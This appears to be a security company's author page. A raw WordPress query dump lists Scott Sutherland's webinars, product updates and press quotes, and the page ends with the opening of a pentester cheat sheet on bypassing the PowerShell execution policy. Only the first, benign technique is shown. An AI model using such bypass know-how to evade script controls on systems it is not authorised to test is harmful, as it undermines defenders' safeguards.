Scott Sutherland

Scott is Vice President of Research at NetSPI. In that role, he helps grow the execution team and services while performing research and development of testing tools, techniques, and methodologies used during engagements. Over sixteen years, Scott has had the opportunity provide security services to small and large organizations (Fortune 5) across many industry verticals, but his focus has always been on identifying critical client needs and designing service delivery models to help meet them. Scott has also been an active participant in the information security community and has contributed multiple open-source tools, technical security blog posts, whitepapers, and presentations.

Below are links to some of his published material:

Presentations
https://www.slideshare.net/nullbind

Recent Open-Source Projects
https://github.com/NetSPI/PowerUpSQL
https://github.com/NetSPI/Powerhuntshares
https://github.com/NetSPI/Powerhunt
More by Scott Sutherland
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "17"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "17"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "17"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "17"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [search_columns] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 1
            [update_post_term_cache] => 1
            [update_menu_item_cache] => 
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "17"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "17"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "17"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "17"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => 
					SELECT   wp_posts.ID
					FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )
					WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{666ae5407192c839d66f574c381752c03e63527d7727715741e9476f01b96a1e}\"17\"{666ae5407192c839d66f574c381752c03e63527d7727715741e9476f01b96a1e}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{666ae5407192c839d66f574c381752c03e63527d7727715741e9476f01b96a1e}\"17\"{666ae5407192c839d66f574c381752c03e63527d7727715741e9476f01b96a1e}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))
					GROUP BY wp_posts.ID
					ORDER BY wp_posts.post_date DESC
					
				
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 31578
                    [post_author] => 53
                    [post_date] => 2023-11-16 13:15:03
                    [post_date_gmt] => 2023-11-16 19:15:03
                    [post_content] => 




Watch Now

In this livestream, we explore the challenges of ransomware readiness and how AI can be your knight in shining armor. NetSPI's VP of Research Scott Sutherland, takes us through a unique three-phased approach to combat ransomware: 

  • Phase 1: Breach and Attack Simulation 
  • Phase 2: IR Tabletop 
  • Phase 3: Custom Runbooks 

Are you ready to equip yourself with the knowledge and tools to combat one of our most significant cybersecurity threats? 

[wonderplugin_video iframe="https://youtu.be/qX4ysXWJBno" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => The Adversary is Using Artificial Intelligence. Why Aren’t You? [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-adversary-is-using-artificial-intelligence-why-arent-you [to_ping] => [pinged] => [post_modified] => 2023-12-06 13:15:56 [post_modified_gmt] => 2023-12-06 19:15:56 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=31578 [menu_order] => 3 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 29856 [post_author] => 53 [post_date] => 2023-03-07 16:16:05 [post_date_gmt] => 2023-03-07 22:16:05 [post_content] =>

In this video, NetSPI Vice President of Research Scott Sutherland provides a deep-dive demo of NetSPI’s Breach and Attack Simulation (BAS) tool. See our centralized detective control validation platform in action and learn how it gives companies the ability to create and execute custom procedures using proven technology and expert human penetration testers.

Ready to continuously simulate real-world attack behaviors, not just IoCs, and put your detective controls to the test in a way no other organization can? See BAS in action or schedule a 1:1 meeting with the NetSPI BAS team to get started.

Table of Contents

00:00 Introduction 

Scott Sutherland explains market trends and gaps that led to the development of NetSPI’s Breach and Attack Simulation. 

02:09 Vocabulary 

Learn key concepts such as Procedure, Play, Playbook, Operation, and Agent, to set the stage for the rest of the video, ensuring that no matter your detective control experience, you understand the benefits and use cases of NetSPI’s Breach and Attack Simulation. 

05:17 The Landing Page 

Learn what it looks like when you first log in to NetSPI’s Breach and Attack Simulation platform. Clearly see summary information about your company’s detective control levels, what agents are active, what operations have recently been completed, and more.  

Scott explains the most used features on this screen: 

  • Download Profile or Download Agent – Designed to make it easy to get started by completing downloads with a single click through our SaaS offering. 
  • Create Operation – Allowing you to learn what you have executed and measure detection levels throughout your organization. 
  • View Results – Jump back into the operation you last ran to view findings and pick up where you left off. 

07:09 Play Execution 

Learn how to execute a play using NetSPI’s Breach and Attack Simulation. We make it simple by organizing plays and procedures by MITRE ATT&CK phase, showing you each individual procedure, technique, when it was last run, and associated visibility levels.  

Here, we also explain how to execute and automate plays within the platform. 

11:58 Workspace 

The Workspace is the main place where analysts and engineers will spend their time. Learn how NetSPI’s Breach and Attack Simulation is designed to enable and educate SOC teams by providing visibility levels, descriptions, business impact, verification instructions, detection improvement guidance, supporting resources and more for each play within the Mitre ATT&CK Framework.  

The Activity Log feature centralizes project status, communications, and reporting between your teams. 

Tags provide SOC teams the answer to the question, “Why does this matter?” by showing the Threat Actor, Tools, and Malware that use this specific attack. 

Finally, data is organized within dynamic charts that update in real-time, allowing your team to understand moment-in-time detection levels. Finally, these charts can be exported for reporting purposes. 

18:47 Timeline

Learn how the Timeline dashboard allows you to measure the effectiveness of detective controls over time and calculate return-on-investment over customizable time periods. Prove the value that investments, staffing, or process changes are delivering. 

21:23 Heatmap

Learn how NetSPI’s Breach and Attack Simulation platform maps detection coverage capabilities to each phase of the cyber kill chain for each tactic or technique within the MITRE ATT&CK framework 

24:28 Operations

Learn how to customize the scope, procedures, plays, playbooks and reporting within an operation. 

26:09 Create & Update

Learn how to create and edit operations for specific use cases such as simulating specific threat behavior, subsets or categories of procedures and plays, or target specific techniques or procedures that you or your organization are concerned about. 

32:25 Playbooks

Learn how to create playbooks within NetSPI’s Breach and Attack Simulation platform.

[post_title] => BAS In Action: NetSPI’s Breach and Attack Simulation Demo [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => breach-and-attack-simulation-demo [to_ping] => [pinged] => [post_modified] => 2023-09-21 14:02:23 [post_modified_gmt] => 2023-09-21 19:02:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=29856 [menu_order] => 28 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 29689 [post_author] => 53 [post_date] => 2023-03-07 13:01:26 [post_date_gmt] => 2023-03-07 19:01:26 [post_content] =>
Watch Now

Many companies test to see if malicious actors can gain access into their environment or steal their valuable information, however, most security professionals don’t know if they would be able to detect adversaries once they are already inside. In fact, only 20% of common attack behaviors are caught by out-of-the-box EDR, MSSP and SEIM solutions.

Enjoy a conversation with Scott Southerland, NetSPI's Vice President of Research, and SANS Institute's John Pescatore for a discussion on how Breach and Attack Simulation (BAS) is a critical piece of security team success at any organization.

You’ll gain valuable insights into:

  • Key BAS market trends.
  • Critical discoveries from years of testing.
  • Noteworthy feedback from security team leaders.

Finally, you will learn how these findings have impacted the development of NetSPI’s latest Breach and Attack Simulation updates, which launched earlier this year, empowering security professionals to efficiently evaluate their detective controls, educate their SOC teams, and execute on actionable intelligence!

[wonderplugin_video iframe="https://youtu.be/6Oy7FTX2WsQ" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Breach and Attack Simulation & Security Team Success [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => breach-and-attack-simulation-security-team-success [to_ping] => [pinged] => [post_modified] => 2023-03-28 12:55:34 [post_modified_gmt] => 2023-03-28 17:55:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=29689 [menu_order] => 30 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 29338 [post_author] => 17 [post_date] => 2023-02-07 09:00:00 [post_date_gmt] => 2023-02-07 15:00:00 [post_content] =>

NetSPI prides itself on maintaining a leadership position in the global offensive security space by listening to client feedback, analyzing industry trends, and investing in breakthrough technology developments.

Over the last few months, our development teams have been busy, and are excited to introduce a variety of new features and capabilities across our Breach and Attack Simulation, Attack Surface Management, and Penetration Testing as a Service (PTaaS) solutions to help organizations improve security posture, streamline remediation, and protect themselves from adversaries.

Of the releases across our solutions portfolio, Breach and Attack Simulation (BAS) received the most significant updates, so let's start there.

Breach and Attack Simulation (BAS) 

NetSPI BAS data shows that only 20% of common attack behaviors are detected by traditional EDR, SIEM, and MSSP solutions. Although most companies spend thousands, even millions, of dollars on detective controls, very few test to validate if they work and provide the value they claim to.

NetSPI’s Breach and Attack Simulation is designed to evaluate detective control effectiveness and educate security operations teams around common TTPs across the cyber kill chain. After many invaluable feedback sessions with NetSPI clients and hours of market research, we are excited to unveil major updates to our Breach and Attack Simulation platform, dialing in on three core dashboards: the Workspace, Timeline, and Heat Map dashboards.

Workspace 

The Workspace is where red teams, purple teams, security engineers, and analysts will spend a majority of their time. Here, they can build, configure and run customized procedures to test their detective controls. Key features within the Workspace include:

  • Utilize preconfigured procedures – or customize your own – to put detective controls to the test 
  • Visualize security posture and identify gaps using detailed summary charts that update in real time. These can be saved and downloaded to easily share with SOC teams and executive leadership to highlight gaps and justify budget for new staff and technology. 
  • While in the Workspace, users can also learn about each detection phase (logged, detected, alerted, responded, and prevented) for common TTPs within the Mitre ATT&CK framework – down to the individual procedure level.  
  • The Activity Log feature allows security teams to ditch the spreadsheets, wiki pages, and notepads they currently use to track information around their detective control capabilities and centralize this information from a summary viewpoint down to the findings level, allowing streamlined communication and remediation. It will also automatically log play execution and visibility state changes. 
  • Tags allow security teams to see the number of malware and threat actors that use the specific technique, helping prioritize resources and remediation efforts. Tags can also be leveraged to generate custom playbooks that include procedures used by unique threat actors, allowing security teams to measure their resiliency to specific threats quickly and easily. 
  • Export test results in JSON or CSV, allowing the SOC team to plug information into existing business processes and products, or develop customized metrics. 

In summary, the Workspace is designed to educate and enable security teams to understand common attack procedures, how to detect them, and provide resources where they can learn more. 

Timeline 

While the Workspace shows a lot of great information, it focuses on a single point in time. The Timeline dashboard, however, allows you to measure detective controls over time.

This allows security teams to prove the value of investments in people, processes or technology. The Timeline Dashboard will also show where things have improved, stayed the same, or gotten worse at any stage of the Mitre ATT&CK kill chain.

While many competitive BAS offerings will show what is being Alerted on, a unique differentiator for NetSPI is the ability to filter results and show changes in what is logged, detected, alerted, responded, and prevented. These changes can be shown as a percentage (i.e. Logging improved 5 percent) or a count (i.e. Logging improved within two different procedures). Similarly to the Workspace, these charts can be downloaded and easily inserted into presentations, emails, or other reports as needed.

For additional information on how NetSPI defines logging, detection, alerting, response, and prevention, read How to Paint a Comprehensive Threat Detection Landscape

Heat Map

Security teams often refer to the Mitre ATT&CK framework, which shows the phases, tactics, or techniques of common TTPs and procedures seen in the wild. We know that many teams prefer seeing results in this framework, and as such, have built it into our Breach and Attack Simulation platform. BAS delivers a familiar way to interact with the data, while still connecting to the workspace created for detection engineers and other security team members.

As mentioned in the Timeline dashboard, a key differentiator is that we show the different visibility levels (logged, detected, alerted, responded, and prevented) within the Mitre ATT&CK framework coverage within each phase of the cyber kill chain and even down to each specific technique.

Here, we also have the ability to dig in and show all of the procedures that are supported within each technique category. These are then cross-linked back to the Workspace, to streamline remediation and re-testing of specific coverage gaps.

This is a quick summary of a few new features and benefits included in our updated Breach and Attack Simulation solution. If you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

Attack Surface Management (ASM) 

Attack Surface Management continues to be a major focus and growing technology within the cybersecurity industry. NetSPI’s most recent ASM updates focus on organizing, filtering, and expanding on information that was previously included, but will now be even easier to locate and pull actionable information from.  

Three key new feature highlights from last quarter include Vulnerability Triggers, Certificate Transparency Logs, and the Subdomain Facet within our domain explore page.

Vulnerability Triggers

First off, what is a vulnerability? Vulnerabilities consist of any exploits of significant risk identified on your attack surface, which are found by combining both assets and exposures. Although a specific asset or exposure might not be very impactful, when combined into a series of steps it can result in a much greater risk.

With the recent introduction of Vulnerability Triggers, admins can now query assets and exposures for specific criteria based on preconfigured or customized search results, and alert on the ones that are the most concerning to you or your company. These Vulnerability Triggers can now be customized to search for criteria related to Domains, IPs, or Ports.

Long story short, Vulnerability triggers allow your company to not only search for common assets, exploits and vulnerabilities, but also key areas of concern for your executive team, industry, organization, or project.

Certificate Transparency Logs & Subdomain Facet

The next two new features are focused on root domain and subdomain discovery.

NetSPI’s ASM has searched root domains and subdomains since its creation, however we are proud to officially introduce Certificate Transparency Logs! We now ingest certificate transparency logs from public data sources, allowing us to significantly increase domain discovery.

We are also excited to announce the release of our Subdomain Facet within our domain explore page. It is common for companies to have tens, or even hundreds, of subdomains on their attack surface, however with the Subdomain Facet within our domains explore page, you will now be able to filter the common subdomains on your attack surface.

A great use case example of this is to discover development subdomains (dev.netspi.com, stage.netspi.com, or prod.netspi.com, etc.) where sensitive projects or intellectual property might be located, and unintentionally exposed externally.

Another common use case for these types of features could be to detect sub domains that have been hijacked by malicious adversaries in an attempt to steal sensitive customer or employee information.

This is a quick summary of a few new features and benefits included in our Attack Surface Management offering, however if you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

Penetration Testing as a Service (Resolve™) 

NetSPI’s Resolve, our penetration testing as a service (PTaaS) platform, has been an industry leader for years, allowing users to visualize their test results and streamline remediation by up to 40%. This product would not be able to remain a leader without continued updates from our product development teams.

Recently, we have been focused on delivering updates to enhance the user experience and make data within the platform to be more accessible and easily leveraged within other security team processes and platforms.

AND/OR Logic

Previously, when users created filters in the grid, AND Logic, as well as OR Logic could be used on filtered search results. We are excited to introduce AND/OR Logic to filters, allowing users to combine both AND Logic and OR Logic to deliver more detailed results to their security teams or business leaders.

Automated Instance State Workflow

Finally, we have introduced automated instance state workflows to include bulk edits. Previously, this was only applicable while updating individual instance states. This change improves efficiencies within the Resolve platform for entire vulnerability management teams.

This is a quick summary of a few new features and benefits included in our PTaaS solution, however if you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

This blog post is a part of our offensive security solutions update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and BAS (Breach and Attack Simulation).


Read past solutions update blogs: 

[post_title] => NetSPI Offensive Security Solutions Updates: Q1 2023 [post_excerpt] => Learn how NetSPI’s updates to Penetration Testing as a Service (PTaaS), Attack Surface Management, and Breach and Attack Simulation can help you better secure your environment. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => offensive-security-updates-q1-2023 [to_ping] => [pinged] => [post_modified] => 2023-05-18 12:55:59 [post_modified_gmt] => 2023-05-18 17:55:59 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29338 [menu_order] => 138 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 29342 [post_author] => 17 [post_date] => 2023-01-31 09:00:00 [post_date_gmt] => 2023-01-31 15:00:00 [post_content] =>

On January 31, NetSPI Scott Sutherland, VP of Research, and Norman Kromberg, CISO, were featured in the SecurityWeek article called Cyber Insights 2023: Cyberinsurance. Read the preview below or view it online.

+++

SecurityWeek Cyber Insights 2023 | Cyberinsurance – Cyberinsurance emerged into the mainstream in 2020. In 2021 it found its sums were wrong over ransomware and it had to increase premiums dramatically. In 2022, Russia invaded Ukraine with the potential for more serious and more costly global nation state cyberattacks – and Lloyds of London announced a stronger and more clear war exclusions clause. 

Higher premiums and wider exclusions are the primary methods for insurance to balance its books – and it is already having to use both. The question for 2023 and beyond is whether the cyberinsurance industry can make a profit without destroying its market. But one thing is certain: a mainstream, funds rich business like insurance will not easily relinquish a market from which it can profit.

It has a third tool, which has not yet been fully unleashed: prerequisites for cover.

The Lloyd’s war exclusion clause and other difficulties

The Lloyd’s exclusion clause dates to the NotPetya incident of 2017. In some cases, insurers refused to pay out on related claims. Josephine Wolff, an associate professor of cybersecurity policy at Fletcher, Tufts, has written a history of cyberinsurance titled Cyberinsurance Policy: Rethinking Risk in an Age of Ransomware, Computer Fraud, Data Breaches, and Cyberattacks.

“Merck and Mondelez, sued their insurers for denying claims related to the attack on the grounds that it was excluded from coverage as a hostile or warlike action because it was perpetrated by a national government,” she explains. However, an initial ruling in late 2021, unsealed in January 2022, indicated that if insurers wanted to exclude state-sponsored attacks from their coverage they must write exclusions stating that explicitly, rather than relying on boilerplate war exclusions. Merck was granted summary judgment on its claim for $1.4 billion.

The Russia/Ukraine kinetic war has caused a massively increased expectation of nation state-inspired cyberattacks against Europe, the US, NATO, and other west-leaning nations. Lloyds rapidly responded with an expanded, but cyberinsurance-centric, war exclusion clause excluding state-sponsored cyberattacks that will kick in from March 2023. 

Insurers’ response

2023 is a watershed moment for cyberinsurance. It will not abandon what promises to be a massive market – but clearly it cannot continue with its makeshift approach of simply increasing both premiums and exclusions to balance the books indefinitely.

Nevertheless, the expansion of ‘prerequisites’ would be a major – and probably inevitable – evolution in the development of cyberinsurance. Cyberinsurance began as a relatively simple gap-filler. The industry recognized that standard business insurance didn’t explicitly cover against cyber risks, and cyberinsurance evolved to fill that gap. In the beginning, there was no intention to impose cybersecurity conditions on the insured, beyond perhaps a few non-specific basics such as having MFA installed.

But now, comments Scott Sutherland, VP of research at NetSPI, “Insurance company security testing standards will evolve.” It’s been done before, and PCIDSS is the classic example. The payment card industry, explains Sutherland, “observed the personal/business risk associated with insufficient security controls and the key stakeholders combined forces to build policies, standards, and testing procedures that could help reduce that risk in a manageable way for their respective industries.”

He continued, “My guess and hope for 2023, is that the major cyber insurance companies start talking about developing a unified standard for qualifying for cyber insurance. Hopefully, that will bring more qualified security testers into that market which can help drive down the price of assessments and reduce the guesswork/risk being taken on by the cyber insurance companies. While there are undoubtedly more cyber insurance companies than card brands, I think it would work in the best interest of the major players to start serious discussions around the issue and potential solutions.”

There is no silver bullet for cybersecurity. Breaches will continue and will continue to rise in cost and severity – and the insurance industry will continue to balance its books through increasing premiums, exclusions, and insurance refusals. The best that can be hoped for from insurers increasing security requirements is that, as Norman Kromberg, CISO at NetSPI suggests, “Cyber Insurance will become a leading driver for investment in security and IT controls.”

You can read the full article at Security Week!

[post_title] => SecurityWeek: Cyber Insights 2023: Cyberinsurance [post_excerpt] => NetSPI Scott Sutherland, VP of Research, and Norman Kromberg, CISO, were featured in the SecurityWeek article called Cyber Insights 2023: Cyberinsurance. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securityweek-cyber-insights-2023-cyberinsurance [to_ping] => [pinged] => [post_modified] => 2023-02-07 16:12:38 [post_modified_gmt] => 2023-02-07 22:12:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29342 [menu_order] => 144 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 29189 [post_author] => 17 [post_date] => 2023-01-11 09:00:00 [post_date_gmt] => 2023-01-11 15:00:00 [post_content] =>

On January 11, NetSPI VP of Research Scott Sutherland was featured in the Help Net Security article called 4 Key Shifts in the Breach and Attack Simulation (BAS) Market. Read the preview below or view it online.

+++

The increase in the number of attack surfaces along with the rise in cybercriminal sophistication is generating technical debt for security operations centers (SOCs), many of which are understaffed and unable to dedicate time to effectively manage the growing number of security tools in their environment.

Yet, regardless of these challenges, SOC teams are tasked to continuously evolve and adapt to defend against emerging, sophisticated threats.

There are several major players in the BAS market that promise continuous automated security control validation. Many can replicate specific attacker behavior and integrate with your telemetry stack to verify that the behavior was observed, generated an alert, and was blocked.

But as the BAS market continues to evolve, there’s also an opportunity to address shortcomings. In the new year, we expect to see several incremental improvements to BAS solutions, with these four themes leading the charge.

More Streamlined Product Deployment to Reduce Costs

Many fully automated security control validation solutions include hidden costs. First, they require up-front configuration for their on-site deployments, which may also require customizations to ensure everything works properly with the integrations. Additionally, BAS solutions need to be proactively maintained, and for enterprise environments this often requires dedicated staff.

As a result, we’ll see BAS vendors work harder to streamline their product deployments to help reduce the overhead cost for their customers through methods such as providing more SaaS-based offerings.

You can read the full article at Help Net Security!

[post_title] => Help Net Security: 4 Key Shifts in the Breach and Attack Simulation (BAS) Market [post_excerpt] => On January 11, NetSPI VP of Research Scott Sutherland was featured in the Help Net Security article called 4 Key Shifts in the Breach and Attack Simulation (BAS) Market. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 4-key-shifts-in-the-breach-and-attack-simulation-bas-market [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:09:55 [post_modified_gmt] => 2023-01-23 21:09:55 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29189 [menu_order] => 153 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 29117 [post_author] => 17 [post_date] => 2022-12-29 09:00:00 [post_date_gmt] => 2022-12-29 15:00:00 [post_content] =>

On December 29, NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. Read the preview below or view it online.

+++

Scott Sutherland, VP of Research, NetSPI

Can DTL Help Stop Software Supply Chain Attacks?

Adoption of distributed ledger technology (DTL) is still in its infancy and we’ll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several “supply chain compromises'' that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem.

Nick Landers, VP of Research, NetSPI

By the end of next year every major financial institution will have announced adoption of Blockchain technology.

There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.

You can read the full article at Enterprise Security Tech!

[post_title] => Enterprise Security Tech: 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain [post_excerpt] => NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => enterprise-security-tech-2023-cybersecurity-predictions [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:09:57 [post_modified_gmt] => 2023-01-23 21:09:57 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29117 [menu_order] => 159 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 1107 [post_author] => 17 [post_date] => 2022-12-16 13:21:46 [post_date_gmt] => 2022-12-16 19:21:46 [post_content] =>

By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be a hurdle for penetration testers, sysadmins, and developers, but it doesn't have to be. In this blog I'll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. I'm sure there are many techniques that I've missed (or simply don't know about), but hopefully this cheat sheet will offer a good start for those who need it.

What is the PowerShell Execution Policy?

The PowerShell execution policy is the setting that determines which type of PowerShell scripts (if any) can be run on the system. By default it is set to "Restricted", which basically means none. However, it's important to understand that the setting was never meant to be a security control. Instead, it was intended to prevent administrators from shooting themselves in the foot. That's why there are so many options for working around it. Including a few that Microsoft has provided. For more information on the execution policy settings and other default security controls in PowerShell I suggest reading Carlos Perez's blog. He provides a nice overview.

Why Would I Want to Bypass the Execution Policy?

Automation seems to be one of the more common responses I hear from people, but below are a few other reasons PowerShell has become so popular with administrators, pentesters, and hackers. PowerShell is:

  • Native to Windows
  • Able to call the Windows API
  • Able to run commands without writing to the disk
  • Able to avoid detection by Anti-virus
  • Already flagged as "trusted" by most application white list solutions
  • A medium used to write many open source pentest toolkits

How to View the Execution Policy

Before being able to use all of the wonderful features PowerShell has to offer, attackers may have to bypass the "Restricted" execution policy. You can take a look at the current configuration with the "Get-ExectionPolicy" PowerShell command. If you're looking at the setting for the first time it's likely set to "Restricted" as shown below.

PS C:> Get-ExecutionPolicy
Administrator: Windows Powershell

It's also worth noting that the execution policy can be set at different levels on the system. To view a list of them use the command below. For more information you can check out Microsoft's "Set-ExecutionPolicy" page here.

Get-ExecutionPolicy -List | Format-Table -AutoSize
Powershell Bypass - ExecutionPolicy

Lab Setup Notes

In the examples below I will use a script named runme.ps1 that contains the following PowerShell command to write a message to the console:

Write-Host "My voice is my passport, verify me."

When I attempt to execute it on a system configured with the default execution policy I get the following error: Powershell Bypass - Set-ExecutionPolicy Restricted

If your current policy is too open and you want to make it more restrictive to test the techniques below, then run the command "Set-ExecutionPolicy Restricted" from an administrator PowerShell console. Ok - enough of my babbling - below are 15 ways to bypass the PowerShell execution policy restrictions.

Bypassing the PowerShell Execution Policy

1. Paste the Script into an Interactive PowerShell Console

Copy and paste your PowerShell script into an interactive console as shown below. However, keep in mind that you will be limited by your current user's privileges. This is the most basic example and can be handy for running quick scripts when you have an interactive console. Also, this technique does not result in a configuration change or require writing to disk.

Interactive PowerShell Console

